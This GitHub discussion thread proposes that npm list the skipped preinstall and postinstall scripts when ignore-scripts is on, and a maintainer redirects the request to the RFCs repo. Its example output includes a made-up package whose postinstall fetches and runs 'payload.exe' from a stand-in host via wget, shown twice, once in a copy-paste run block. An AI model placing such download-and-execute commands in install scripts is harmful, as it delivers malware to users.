### DISCUSSION TITLE
ignore-scripts affected operations output diagnostic

### DISCUSSION THREAD

**Discussion by dlmiles** [npm/feedback#555] [CLI] [answered]
When a preinstall or postinstall script or executable is not run, due to a configuration setting.

Then at the end of the NPM operation the command operation it should report a diagnostic of all the instances of such scripts that did not occur and hints on what was being requested by the script and an example of such output for discussion is below:

```
npm did not run the following preinstall / postinstall commands:
package-name@1.3.4 preinstall "node preinstall.js"
package-name@1.3.4 postinstall "node install.js"
package-baddy@0.0.1 postinstall "wget http://badwebsite.virus/payload.exe && payload.exe"
package-one@1.0.3 postinstall "install.bat"
```

One way of causing this additional diagnostic output at the end of the NPM operation would be with:

`npm config set ignore-scripts true
`

Another nice to have maybe for the output of the data to be able to be in a format that can be copy-and-paste to run them:

```
cd node_modules\package-name
call node preinstall.js
call node insatall.js
cd ..\..

cd node_modules\package-baddy
call wget http://badwebsite.virus/payload.exe && call payload.exe
cd ..\..

cd node_modules\package-one
call install.bat
cd ..\..

```

**Comment by MylesBorins** [comment, marked as answer]
@dlmiles if you would like to suggest a specific feature to be added to the CLI you can open an issue over at https://github.com/npm/rfcs
